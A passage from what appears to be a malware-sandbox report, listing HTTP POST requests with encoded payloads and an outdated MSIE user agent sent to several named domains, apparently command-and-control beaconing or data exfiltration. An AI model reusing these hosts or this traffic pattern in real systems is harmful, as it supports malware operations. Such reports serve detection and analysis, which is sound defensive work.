77 63 7a 63 57 48 6c 6c 79 38 4e 39 68 57 4a 78 68 69 58 4a 2f 76 76 75 67 62 46 71 43 6f 69 47 69 31 51 7a 53 41 75 65 6f 34 4f 46 39 41 4c 31 78 65 4b 36 6e 55 37 4f 44 36 6d 6c 32 47 75 69 61 5a 48 78 73 52 4d 50 78 77 6b 4d 34 65 4d 47 6b 57 6a 4e 63 68 38 5a 6c 4b 4a 2f 6a 2b 62 4b 6d 2f 62 54 63 6a 4d 52 44 56 77 33 42 65 41 6a 7a 63 6f 42 62 45 41 6b 47 75 2f 6d 34 4c 67 36 49 5a 2b 6f 49 33 78 6c 42 4f 56 48 35 30 61 52 66 73 2b 37 38 49 35 61 76 6c 43 55 43 66 39 33 41 74 79 59 54 42 6f 42 68 72 4c 69 4a 52 62 53 72 41 51 4c 55 61 6b 49 31 4d 6c 77 79 7a 75 58 4a 69 79 45 64 59 57 38 61 4c 71 56 50 45 6e 4b 37 7a 49 62 6a 62 4e 71 73 67 54 6f 6d 34 54 7a 67 51 53 4a 57 39 73 41 4f 47 64 45 6e 73 4d 6e 69 42 4c 7a 4a 54 56 5a 6d 31 64 2b 62 35 65 6b 46 56 5a 47 53 43 50 36 47 55 4e 75 36 5a 39 74 5a 6c 36 72 62 65 67 73 4b 30 47 59 58 75 37 67 5a 68 57 6a 4f 36 6d 70 6c 51 6c 42 5a 42 33 37 38 59 52 5a 32 65 6b 74 41 2b 56 72 6f 6b 77 7a 73 68 37 52 4b 35 33 5a 59 59 59 42 51 63 72 51 64 62 6c 4e 48 78 59 56 4a 6b 36 74 77 6a 32 51 30 67 70 4a 55 78 33 73 Data Ascii: EyZIRSxLev6hryMwF0zkOT+br56EB3Y5ID/eO4Mwf80wJYiaR8e24hgTaYiYC5gv2C0dkhP1s6S915/xiI5edjdAVWCwFAGF+DQPE8IMBAXJZ/GY1jIT5/DJQUM2EKf57asuIyetpYK71HLbdsws6XSbtKingoU/H9fo4EohbFaVaW6wAGE+43DxuyszNPTgYxCcgvHfyYtpKG59eNSlUGqhwczcWHlly8N9hWJxhiXJ/vvugbFqCoiGi1QzSAueo4OF9AL1xeK6nU7OD6ml2GuiaZHxsRMPxwkM4eMGkWjNch8ZlKJ/j+bKm/bTcjMRDVw3BeAjzcoBbEAkGu/m4Lg6IZ+oI3xlBOVH50aRfs+78I5avlCUCf93AtyYTBoBhrLiJRbSrAQLUakI1MlwyzuXJiyEdYW8aLqVPEnK7zIbjbNqsgTom4TzgQSJW9sAOGdEnsMniBLzJTVZm1d+b5ekFVZGSCP6GUNu6Z9tZl6rbegsK0GYXu7gZhWjO6mplQlBZB378YRZ2ektA+Vrokwzsh7RK53ZYYYBQcrQdblNHxYVJk6twj2Q0gpJUx3s
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.cel-cpa.comCache-Control: no-cacheData Raw: 58 71 32 69 38 2b 31 45 69 50 36 4e 6f 64 48 32 35 4f 48 31 4c 36 62 58 34 71 62 62 50 6d 50 30 63 5a 78 66 74 61 46 67 67 42 62 4d 49 64 44 6d 6d 43 72 79 74 48 33 30 41 46 36 79 73 74 64 4d 68 43 44 5a 6e 4e 64 4b 79 6b 43 57 63 44 35 52 6d 49 56 42 45 4b 55 75 4d 35 75 59 59 56 32 2f 61 58 46 56 4c 35 79 69 61 64 46 43 4d 30 65 4f 46 63 77 6e 2f 65 7a 66 7a 4d 56 65 67 76 43 36 2b 46 56 4f 41 61 74 6a 63 62 47 4c 37 76 54 71 4d 68 66 52 56 6f 4f 39 53 49 35 49 34 4a 30 2f 65 59 42 50 4f 42 4d 43 4a 70 6f 67 78 67 61 71 73 35 6c 48 72 6d 69 6a 68 68 50 50 38 38 71 50 7a 41 35 48 71 35 49 73 51 47 6f 77 31 7a 65 68 52 58 48 4b 53 58 2f 65 6a 34 55 43 2f 65 69 65 43 2b 65 6a 65 4e 69 63 62 42 68 43 77 77 78 30 30 2b 70 2f 52 67 51 73 37 38 6a 4f 6a 69 4b 34 33 76 55 45 4d 34 4e 49 67 58 2b 57 70 2b 66 4a 6c 57 42 51 69 71 2b 78 33 62 37 2f 78 66 6b 31 78 47 54 55 66 38 5a 4b 4e 38 6f 7a 78 54 78 4a 73 4d 34 54 63 6d 49 33 52 31 63 4a 6d 58 30 61 37 67 6f 54 58 38 4d 68 53 71 68 77 61 71 31 2f 34 2b 74 31 2b 79 4f 55 59 34 6b 39 4c 6a 72 37 65 6a 51 7a 6a 67 33 44 54 7a 2f 7a 50 44 69 6d 45 31 45 71 33 70 72 45 37 6c 4c 2b 33 57 2f 78 35 50 35 78 35 79 68 49 62 6c 57 4e 65 65 66 46 36 66 79 34 51 47 4d 71 72 4c 79 4c 2b 41 39 59 34 78 37 4f 58 77 39 48 61 77 61 46 5a 4a 54 4b 47 69 69 37 4c 4b 6a 56 4e 79 71 52 63 36 62 53 6c 53 39 6c 33 50 66 6a 4d 6a 43 77 32 66 4b 41 71 6d 4a 62 4c 73 5a 36 57 2b 69 75 52 62 4b 6e 47 6c 67 39 58 6a 76 69 5a 62 62 41 2b 31 71 78 2f 49 35 34 6c 48 63 70 43 75 78 36 76 2f 59 52 6f 6a 2b 77 4b 48 71 44 35 4d 59 5a 41 30 67 6f 64 70 64 73 77 36 6e 43 54 4e 7a 4b 6b 34 66 75 58 55 70 67 2f 75 53 6b 43 76 4d 4d 76 4a 66 6e 32 68 63 59 59 66 56 61 76 4a 68 6a Data Ascii: Xq2i8+1EiP6NodH25OH1L6bX4qbbPmP0cZxftaFggBbMIdDmmCrytH30AF6ystdMhCDZnNdKykCWcD5RmIVBEKUuM5uYYV2/aXFVL5yiadFCM0eOFcwn/ezfzMVegvC6+FVOAatjcbGL7vTqMhfRVoO9SI5I4J0/eYBPOBMCJpogxgaqs5lHrmijhhPP88qPzA5Hq5IsQGow1zehRXHKSX/ej4UC/eieC+ejeNicbBhCwwx00+p/RgQs78jOjiK43vUEM4NIgX+Wp+fJlWBQiq+x3b7/xfk1xGTUf8ZKN8ozxTxJsM4TcmI3R1cJmX0a7goTX8MhSqhwaq1/4+t1+yOUY4k9Ljr7ejQzjg3DTz/zPDimE1Eq3prE7lL+3W/x5P5x5yhIblWNeefF6fy4QGMqrLyL+A9Y4x7OXw9HawaFZJTKGii7LKjVNyqRc6bSlS9l3PfjMjCw2fKAqmJbLsZ6W+iuRbKnGlg9XjviZbbA+1qx/I54lHcpCux6v/YRoj+wKHqD5MYZA0godpdsw6nCTNzKk4fuXUpg/uSkCvMMvJfn2hcYYfVavJhj
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.gpthink.comCache-Control: no-cacheData Raw: 47 77 6f 34 42 4d 79 4e 5a 2f 37 69 61 5a 76 4d 4e 32 34 63 51 39 38 57 51 73 6d 6b 48 73 6a 53 77 42 50 2f 5a 55 32 61 48 4d 31 50 33 64 4b 74 4c 6d 4c 65 30 6e 51 31 64 44 2b 35 39 69 54 37 68 35 54 37 79 4d 57 63 64 52 4f 64 58 39 67 52 5a 66 33 69 74 38 63 54 4b 73 30 33 51 74 73 31 52 41 2f 45 49 36 71 65 45 6a 4e 37 4b 62 45 62 49 66 38 67 30 52 4b 2b 70 4b 46 41 77 78 67 34 78 67 50 4b 74 39 33 68 4d 6e 79 6c 2f 77 66 33 71 6c 4d 66 2f 46 58 53 70 33 2f 34 36 70 63 4d 36 4f 35 2f 6b 69 51 38 69 4e 31 54 39 6e 4e 7a 6b 63 33 56 47 7a 4b 46 63 58 55 7a 65 31 52 61 45 4b 69 6f 47 49 30 72 36 77 35 41 38 62 49 48 2f 57 41 37 75 55 47 39 6e 7a 52 2f 33 4b 6e 36 2b 7a 7a 31 48 2b 43 6f 32 30 4b 75 56 69 68 32 34 4c 33 70 70 76 6a 4e 46 72 4c 70 57 71 65 52 75 44 6c 70 47 70 6e 2b 2b 49 59 55 5a 34 57 76 34 6b 62 32 59 74 4c 4a 50 30 31 76 63 65 4c 41 77 4c 70 56 66 67 59 56 74 6e 48 51 62 6c 5a 6f 2f 2f 68 44 4f 4a 65 32 7a 52 7a 4c 66 42 76 6f 48 66 53 32 47 75 6f 52 77 47 66 76 76 43 39 42 47 2b 63 6d 68 57 70 67 62 74 53 61 76 33 63 5a 46 32 6c 71 68 44 6e 78 38 6d 7a 74 62 36 6e 48 63 4e 57 6e 79 7a 6c 71 4b 39 35 66 61 75 39 67 63 57 73 4b 4b 61 38 39 31 70 69 59 43 57 55 32 4c 47 34 38 4a 4e 5a 75 50 2f 75 63 65 79 33 6d 55 47 74 47 34 5a 76 4d 69 73 76 4d 63 52 53 5a 6b 4a 59 33 71 47 59 53 76 72 7a 68 49 44 7a 67 57 30 45 78 54 6f 58 57 61 73 78 44 6c 30 31 6e 6d 4f 49 67 73 47 7a 2f 35 4c 50 58 53 5a 4b 54 30 48 75 68 35 39 4b 36 53 34 51 31 4d 32 49 70 4f 2b 59 51 37 6f 68 46 76 78 49 4c 75 50 64 6e 70 4d 56 36 76 4f 67 33 4d 31 30 56 6a 74 65 42 4a 43 68 6e 69 69 68 58 Data Ascii: Gwo4BMyNZ/7iaZvMN24cQ98WQsmkHsjSwBP/ZU2aHM1P3dKtLmLe0nQ1dD+59iT7h5T7yMWcdROdX9gRZf3it8cTKs03Qts1RA/EI6qeEjN7KbEbIf8g0RK+pKFAwxg4xgPKt93hMnyl/wf3qlMf/FXSp3/46pcM6O5/kiQ8iN1T9nNzkc3VGzKFcXUze1RaEKioGI0r6w5A8bIH/WA7uUG9nzR/3Kn6+zz1H+Co20KuVih24L3ppvjNFrLpWqeRuDlpGpn++IYUZ4Wv4kb2YtLJP01vceLAwLpVfgYVtnHQblZo//hDOJe2zRzLfBvoHfS2GuoRwGfvvC9BG+cmhWpgbtSav3cZF2lqhDnx8mztb6nHcNWnyzlqK95fau9gcWsKKa891piYCWU2LG48JNZuP/ucey3mUGtG4ZvMisvMcRSZkJY3qGYSvrzhIDzgW0ExToXWasxDl01nmOIgsGz/5LPXSZKT0Huh59K6S4Q1M2IpO+YQ7ohFvxILuPdnpMV6vOg3M10VjteBJChniihX
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.holleman.usCache-Control: no-cacheData Raw: 64 33 46 65 46 61 73 72 54 2f 34 59 73 41 35 42 67 6b 32 4e 39 52 52 7a 72 59 64 78 5a 31 6c 47 44 2f 67 4c 7a 51 5a 50 44 31 2f 51 74 55 77 66 67 66 79 4b 34 70 52 50 31 76 50 42 75 6a 49 5a 5a 59 70 30 77 6f 77 64 39 74 33 6a 33 31 76 2f 34 52 71 6e 7a 6b 4a 79 77 39 45 68 66 33 61 48 4d 4b 36 37 6f 42 4a 33 48 58 51 79 68 68 4b 6c 53 30 36 79 50 5a 6d 4a 35 30 5a 4f 68 56 4d 48 55 53 6d 6a 4a 2b 43 73 47 37 77 4d 45 49 47 54 64 6b 50 63 33 51 6f 67 77 39 59 69 73 38 7a 74 4c 62 39 63 70 35 45 49 4b 57 74 56 63 54 36 68 52 4b 31 64 70 58 75 6e 50 39 64 4f 74 7a 4b 2f 61 74 6e 41 69 67 75 47 6f 72 46 45 32 42 77 34 2b 4e 7a 4b 66 53 70 70 38 62 68 61 30 36 63 71 7a 5a 75 61 45 71 61 33 69 66 30 43 6e 78 37 51 47 73 55 4b 70 70 6b 47 6f 4f 4a 34 74 4c 56 47 32 6c 6f 33 5a 7a 34 6c 6a 35 50 39 50 68 58 33 6c 37 31 4e 6a 62 42 51 4d 4a 66 57 76 4e 57 4a 4e 77 2b 33 78 39 6d 64 51 4e 4d 64 38 48 70 38 5a 77 49 71 58 64 71 6a 55 2b 6e 6a 7a 34 69 73 42 70 43 44 56 68 37 51 62 63 65 77 42 6e 33 51 54 74 63 30 47 32 62 42 4b 6f 44 35 38 73 56 6f 67 2b 4e 63 74 68 63 59 46 4b 32 2b 48 4c 5a 31 41 45 30 66 68 32 4c 30 51 61 46 37 62 33 41 61 4c 70 4f 63 33 79 6c 4a 63 4c 4d 62 63 41 70 4f 78 6b 73 4d 59 4b 57 73 43 31 32 70 31 56 4f 4e 71 77 4d 79 51 5a 37 46 64 6e 56 58 76 78 6b 63 73 5a 58 76 75 4f 55 75 5a 71 6b 7a 4e 45 4a 76 68 4f 4a 34 57 39 48 57 78 72 73 72 78 74 59 57 35 31 62 45 78 4e 7a 78 63 73 4d 72 79 51 47 43 4e 35 39 4b 59 37 33 62 38 66 31 36 30 58 74 4c 6f 52 79 6d 6f 72 64 42 79 2f 45 68 44 65 65 51 6a 31 6d 6e 6f 77 42 45 58 35 52 4a 4c 5a 6d 59 52 6a 6e 34 68 55 73 53 42 46 6b 4a 4b 6a 5a 78 56 49 69 67 34 53 7a 49 41 68 6e 35 6c 6b 2f 47 36 61 33 47 62 6a 69 53 6b 32 70 4a 33 47 6e 74 57 54 33 6e Data Ascii: d3FeFasrT/4YsA5Bgk2N9RRzrYdxZ1lGD/gLzQZPD1/QtUwfgfyK4pRP1vPBujIZZYp0wowd9t3j31v/4RqnzkJyw9Ehf3aHMK67oBJ3HXQyhhKlS06yPZmJ50ZOhVMHUSmjJ+CsG7wMEIGTdkPc3Qogw9Yis8ztLb9cp5EIKWtVcT6hRK1dpXunP9dOtzK/atnAiguGorFE2Bw4+NzKfSpp8bha06cqzZuaEqa3if0Cnx7QGsUKppkGoOJ4tLVG2lo3Zz4lj5P9PhX3l71NjbBQMJfWvNWJNw+3x9mdQNMd8Hp8ZwIqXdqjU+njz4isBpCDVh7QbcewBn3QTtc0G2bBKoD58sVog+NcthcYFK2+HLZ1AE0fh2L0QaF7b3AaLpOc3ylJcLMbcApOxksMYKWsC12p1VONqwMyQZ7FdnVXvxkcsZXvuOUuZqkzNEJvhOJ4W9HWxrsrxtYW51bExNzxcsMryQGCN59KY73b8f160XtLoRymordBy/EhDeeQj1mnowBEX5RJLZmYRjn4hUsSBFkJKjZxVIig4SzIAhn5lk/G6a3GbjiSk2pJ3GntWT3n
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora-ito.comCache-Control: no-cacheData Raw: 6a 68 68 2f 6e 47 50 79 78 2f 37 4e 68 47 64 4f 36 72 54 55 67 6f 7a 43 45 6a 2b 4a 67 4e 2b 32 52 31 61 37 63 63 2f 59 62 2f 4e 64 5a 36 44 30 76 71 72 2b 49 48 79 54 36 79 49 49 68 67 63 73 37 66 58 45 38 6e 73 49 38 4a 64 31 70 38 4d 37 57 61 71 65 6c 63 68 31 6f 6f 46 53 55 42 6a 50 65 74 2f 6b 49 41 31 78 33 71 48 78 65 36 42 66 52 43 6f 45 79 39 71 67 57 32 2b 4c 2f 30 59 5a 35 63 36 50 6c 4d 61 59 46 71 51 62 47 72 78 76 59 4b 39 52 65 4a 72 34 2f 57 73 39 56 57 75 54 51 76 47 62 32 68 4a 54 38 62 6e 4d 42 50 6b 54 71 42 76 57 75 62 74 39 4a 55 41 32 41 38 56 67 41 61 35 45 53 38 4a 54 65 63 6a 55 6d 35 77 4a 43 66 7a 4b 6a 2b 67 43 4c 67 45 32 51 76 57 69 62 2f 45 36 75 73 4d 5a 44 43 70 53 64 2f 68 42 4c 34 6b 66 30 41 41 53 51 54 73 74 41 5a 2f 31 47 63 6d 55 4a 38 4f 6a 51 53 53 4e 63 47 63 79 68 31 63 57 79 63 55 73 61 62 48 54 45 58 57 67 4c 2f 50 6d 43 5a 45 63 30 2f 61 35 41 6c 6b 37 7a 74 46 59 30 36 74 48 42 58 6d 4e 4e 6a 35 77 71 58 49 4a 39 49 68 38 4a 39 36 62 70 67 30 44 79 56 69 65 78 65 70 4e 67 6f 62 45 54 62 57 43 67 38 61 78 66 73 5a 32 42 77 67 35 48 35 53 65 5a 57 6b 6b 78 73 72 4f 74 55 31 38 6c 2b 35 4e 38 35 59 57 77 75 4c 64 6c 75 6c 65 6d 73 75 69 51 72 78 6a 61 45 39 49 2f 47 52 6a 6c 36 66 2f 6a 5a 65 57 6f 48 39 76 6e 4f 46 32 39 6e 76 78 46 36 34 6d 63 66 36 37 56 42 6c 4a 69 51 63 2b 73 34 6f 75 56 36 35 6d 6f 62 39 71 6b 50 34 4f 6a 4a 4a 4b 74 44 35 67 2f 72 6e 67 35 59 39 77 78 57 7a 59 57 49 51 74 68 57 74 42 63 46 44 58 69 4b 75 6f 67 56 6e 35 73 37 66 38 7a 71 2f 58 41 4d 55 63 56 71 78 48 71 77 64 66 50 30 44 73 53 6c 6d 62 46 62 76 36 57 54 33 54 34 59 39 45 44 6b 64 57 76 30 76 4f 77 47 66 4a 4b 50 42 41 38 49 30 3d Data Ascii: jhh/nGPyx/7NhGdO6rTUgozCEj+JgN+2R1a7cc/Yb/NdZ6D0vqr+IHyT6yIIhgcs7fXE8nsI8Jd1p8M7Waqelch1ooFSUBjPet/kIA1x3qHxe6BfRCoEy9qgW2+L/0YZ5c6PlMaYFqQbGrxvYK9ReJr4/Ws9VWuTQvGb2hJT8bnMBPkTqBvWubt9JUA2A8VgAa5ES8JTecjUm5wJCfzKj+gCLgE2QvWib/E6usMZDCpSd/hBL4kf0AASQTstAZ/1GcmUJ8OjQSSNcGcyh1cWycUsabHTEXWgL/PmCZEc0/a5Alk7ztFY06tHBXmNNj5wqXIJ9Ih8J96bpg0DyViexepNgobETbWCg8axfsZ2Bwg5H5SeZWkkxsrOtU18l+5N85YWwuLdlulemsuiQrxjaE9I/GRjl6f/jZeWoH9vnOF29nvxF64mcf67VBlJiQc+s4ouV65mob9qkP4OjJJKtD5g/rng5Y9wxWzYWIQthWtBcFDXiKuogVn5s7f8zq/XAMUcVqxHqwdfP0DsSlmbFbv6WT3T4Y9EDkdWv0vOwGfJKPBA8I0=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.c9dd.comCache-Control: no-cacheData Raw: 74 6e 7a 41 52 32 31 51 6b 2f 34 56 7a 2b 35 34 5a 48 61 61 74 69 5a 76 54 36 70 62 59 4d 51 77 38 5a 2b 42 6f 67 4e 32 45 42 56 58 44 2b 51 69 57 70 2b 2b 39 39 53 78 58 55 64 6e 75 46 34 49 38 36 4d 2f 70 7a 6b 72 41 69 73 42 42 62 4c 4b 34 53 50 6c 4e 67 6b 4b 4c 62 52 47 35 39 56 68 65 71 6e 7a 38 73 2b 6d 64 62 4b 52 39 77 39 54 79 4a 38 6d 70 6f 4e 77 62 34 43 39 57 50 39 4a 56 45 49 32 46 55 64 48 34 55 42 50 78 53 30 33 4d 30 62 61 63 68 52 34 73 7a 56 43 49 59 69 64 48 4d 76 30 4e 56 64 53 54 43 67 4a 33 45 68 43 68 42 78 76 69 6f 56 58 49 62 4e 67 4e 50 6d 69 6c 34 49 36 4a 42 4e 34 32 4c 52 38 74 52 5a 62 76 4a 52 2b 4a 70 6b 74 78 62 4c 75 57 6c 41 4b 44 37 36 69 4b 6f 6e 68 6f 42 59 69 72 7a 64 42 74 52 6e 6a 39 48 52 70 30 50 62 51 66 65 63 47 64 6d 72 71 38 50 37 30 51 55 49 6f 76 70 48 4f 45 6c 62 77 78 6d 56 69 77 2b 31 56 72 73 41 52 30 4c 6b 4e 68 6a 77 75 53 46 61 62 49 6d 71 65 32 33 7a 39 6f 55 46 65 64 37 79 44 4e 78 50 5a 54 35 61 77 38 79 46 69 66 36 61 6d 52 6a 50 48 61 59 79 49 32 75 70 4d 4d 71 2b 36 45 6e 69 4f 37 58 72 4b 65 32 30 44 2f 4c 55 4d 47 32 6a 62 6a 30 4b 37 30 34 70 66 32 62 54 37 2b 6e 67 4f 51 62 69 41 57 32 38 4b 61 73 52 74 4c 48 65 7a 4a 42 6c 4c 54 67 58 37 4d 79 6b 46 54 78 4b 39 37 42 6b 39 76 61 66 76 30 61 41 33 65 79 42 64 59 30 2b 48 76 56 58 6a 73 48 2b 4d 41 4f 75 35 2b 33 6b 38 6c 31 62 48 6e 65 77 39 77 4f 4b 47 31 64 30 36 34 37 53 75 55 51 43 68 57 35 38 37 68 72 5a 73 38 65 4e 33 34 38 36 38 5a 62 75 47 63 55 41 31 71 76 46 51 6d 2b 4b 4c 62 5a 79 35 4f 31 69 6b 32 7a 47 2f 56 67 74 5a 34 50 41 66 31 38 6e 4c 45 38 62 38 74 61 50 2f 5a 77 4f 52 38 46 4a 4c 4b 45 2b 38 73 67 36 2b 69 55 35 62 51 70 7a 45 64 72 65 76 30 71 61 31 33 6d 67 64 47 4a 77 4c 46 56 77 3d Data Ascii: tnzAR21Qk/4Vz+54ZHaatiZvT6pbYMQw8Z+BogN2EBVXD+QiWp++99SxXUdnuF4I86M/pzkrAisBBbLK4SPlNgkKLbRG59Vheqnz8s+mdbKR9w9TyJ8mpoNwb4C9WP9JVEI2FUdH4UBPxS03M0bachR4szVCIYidHMv0NVdSTCgJ3EhChBxvioVXIbNgNPmil4I6JBN42LR8tRZbvJR+JpktxbLuWlAKD76iKonhoBYirzdBtRnj9HRp0PbQfecGdmrq8P70QUIovpHOElbwxmViw+1VrsAR0LkNhjwuSFabImqe23z9oUFed7yDNxPZT5aw8yFif6amRjPHaYyI2upMMq+6EniO7XrKe20D/LUMG2jbj0K704pf2bT7+ngOQbiAW28KasRtLHezJBlLTgX7MykFTxK97Bk9vafv0aA3eyBdY0+HvVXjsH+MAOu5+3k8l1bHnew9wOKG1d0647SuUQChW587hrZs8eN34868ZbuGcUA1qvFQm+KLbZy5O1ik2zG/VgtZ4PAf18nLE8b8taP/ZwOR8FJLKE+8sg6+iU5bQpzEdrev0qa13mgdGJwLFVw=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora-ito.comCache-Control: no-cacheData Raw: 6a 68 68 2f 6e 47 50 79 78 2f 37 4e 68 47 64 4f 36 72 54 55 67 6f 7a 43 45 6a 2b 4a 67 4e 2b 32 52 31 61 37 63 63 2f 59 62 2f 4e 64 5a 36 44 30 76 71 72 2b 49 48 79 54 36 79 49 49 68 67 63 73 37 66 58 45 38 6e 73 49 38 4a 64 31 70 38 4d 37 57 61 71 65 6c 63 68 31 6f 6f 46 53 55 42 6a 50 65 74 2f 6b 49 41 31 78 33 71 48 78 65 36 42 66 52 43 6f 45 79 39 71 67 57 32 2b 4c 2f 30 59 5a 35 63 36 50 6c 4d 61 59 46 71 51 62 47 72 78 76 59 4b 39 52 65 4a 72 34 2f 57 73 39 56 57 75 54 51 76 47 62 32 68 4a 54 38 62 6e 4d 42 50 6b 54 71 42 76 57 75 62 74 39 4a 55 41 32 41 38 56 67 41 61 35 45 53 38 4a 54 65 63 6a 55 6d 35 77 4a 43 66 7a 4b 6a 2b 67 43 4c 67 45 32 51 76 57 69 62 2f 45 36 75 73 4d 5a 44 43 70 53 64 2f 68 42 4c 34 6b 66 30 41 41 53 51 54 73 74 41 5a 2f 31 47 63 6d 55 4a 38 4f 6a 51 53 53 4e 63 47 63 79 68 31 63 57 79 63 55 73 61 62 48 54 45 58 57 67 4c 2f 50 6d 43 5a 45 63 30 2f 61 35 41 6c 6b 37 7a 74 46 59 30 36 74 48 42 58 6d 4e 4e 6a 35 77 71 58 49 4a 39 49 68 38 4a 39 36 62 70 67 30 44 79 56 69 65 78 65 70 4e 67 6f 62 45 54 62 57 43 67 38 61 78 66 73 5a 32 42 77 67 35 48 35 53 65 5a 57 6b 6b 78 73 72 4f 74 55 31 38 6c 2b 35 4e 38 35 59 57 77 75 4c 64 6c 75 6c 65 6d 73 75 69 51 72 78 6a 61 45 39 49 2f 47 52 6a 6c 36 66 2f 6a 5a 65 57 6f 48 39 76 6e 4f 46 32 39 6e 76 78 46 36 34 6d 63 66 36 37 56 42 6c 4a 69 51 63 2b 73 34 6f 75 56 36 35 6d 6f 62 39 71 6b 50 34 4f 6a 4a 4a 4b 74 44 35 67 2f 72 6e 67 35 59 39 77 78 57 7a 59 57 49 51 74 68 57 74 42 63 46 44 58 69 4b 75 6f 67 56 6e 35 73 37 66 38 7a 71 2f 58 41 4d 55 63 56 71 78 48 71 77 64 66 50 30 44 73 53 6c 6d 62 46 62 76 36 57 54 33 54 34 59 39 45 44 6b 64 57 76 30 76 4f 77 47 66 4a 4b 50 42 41 38 49 30 3d Data Ascii: jhh/nGPyx/7NhGdO6rTUgozCEj+JgN+2R1a7cc/Yb/NdZ6D0vqr+IHyT6yIIhgcs7fXE8nsI8Jd1p8M7Waqelch1ooFSUBjPet/kIA1x3qHxe6BfRCoEy9qgW2+L/0YZ5c6PlMaYFqQbGrxvYK9ReJr4/Ws9VWuTQvGb2hJT8bnMBPkTqBvWubt9JUA2A8VgAa5ES8JTecjUm5wJCfzKj+gCLgE2QvWib/E6usMZDCpSd/hBL4kf0AASQTstAZ/1GcmUJ8OjQSSNcGcyh1cWycUsabHTEXWgL/PmCZEc0/a5Alk7ztFY06tHBXmNNj5wqXIJ9Ih8J96bpg0DyViexepNgobETbWCg8axfsZ2Bwg5H5SeZWkkxsrOtU18l+5N85YWwuLdlulemsuiQrxjaE9I/GRjl6f/jZeWoH9vnOF29nvxF64mcf67VBlJiQc+s4ouV65mob9qkP4OjJJKtD5g/rng5Y9wxWzYWIQthWtBcFDXiKuogVn5s7f8zq/XAMUcVqxHqwdfP0DsSlmbFbv6WT3T4Y9EDkdWv0vOwGfJKPBA8I0=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jchysk.comCache-Control: no-cacheData Raw: 36 35 4b 59 34 53 31 41 73 66 35 38 6b 7a 71 55 4a 43 4e 6d 44 2b 61 77 4f 7a 49 62 65 30 34 4c 73 65 4f 4d 79 42 31 79 48 45 45 43 6d 6d 2f 66 65 67 62 70 4a 48 74 4a 6b 58 72 47 4c 65 52 57 53 2f 71 42 76 49 79 69 32 41 45 4e 52 4b 32 63 57 6f 49 2f 79 42 44 6b 7a 63 69 4a 55 70 4c 6f 62 78 79 53 6d 45 46 6f 67 34 4b 49 41 73 36 31 6d 75 67 63 38 44 62 4f 4e 69 58 6e 72 67 6d 65 54 64 46 44 47 79 73 38 74 72 68 57 5a 74 6d 46 4d 31 38 50 46 50 39 54 42 45 6a 67 77 51 72 32 59 4b 79 5a 56 52 38 39 61 58 55 67 47 7a 36 57 31 48 4a 6e 68 6b 35 43 77 6c 73 53 41 2f 6a 32 59 52 52 62 64 56 4d 42 4a 67 4c 65 48 4d 52 59 6e 74 56 4f 30 54 33 63 4e 4d 73 4a 71 6a 49 62 4b 43 6f 62 42 62 31 6f 52 62 73 65 62 62 35 51 4b 41 47 2f 6d 7a 50 49 6d 6c 41 53 30 4f 42 47 6f 2b 48 6b 47 43 2b 66 50 65 72 4c 41 4a 76 66 37 64 38 53 43 53 47 54 75 68 7a 71 37 44 35 66 58 32 45 45 58 51 63 54 79 6b 43 55 64 4d 4f 35 32 4d 2f 56 48 6c 74 6a 51 49 44 52 63 50 4d 32 65 30 38 4d 50 57 54 31 52 71 35 65 6b 34 62 30 39 33 74 39 7a 47 5a 7a 39 64 36 6e 77 79 35 6f 62 43 6b 41 72 62 77 58 44 71 55 38 6f 34 44 2b 69 75 73 74 6b 56 44 54 55 39 4c 6a 35 70 36 53 31 37 6a 52 72 31 46 4f 31 30 57 63 61 50 68 65 2f 46 55 74 6e 4f 30 31 6c 78 53 39 58 4c 4f 74 56 66 4e 45 41 76 6d 34 44 4e 62 49 4d 4b 43 6d 57 48 38 43 72 75 50 43 66 4b 51 4d 2f 57 31 33 72 70 46 41 62 4b 6d 6f 58 71 56 67 71 52 55 36 4e 2f 57 31 42 73 75 57 6d 50 54 4c 6a 4e 77 64 2b 67 59 41 69 4c 41 38 6a 36 52 73 34 4e 72 72 71 5a 71 4d 5a 65 6b 77 47 4f 34 42 6a 47 73 70 48 53 76 39 4a 2f 78 4d 78 4a 2f 46 49 6f 43 34 73 31 4f 63 49 6e 58 34 49 77 3d 3d Data Ascii: 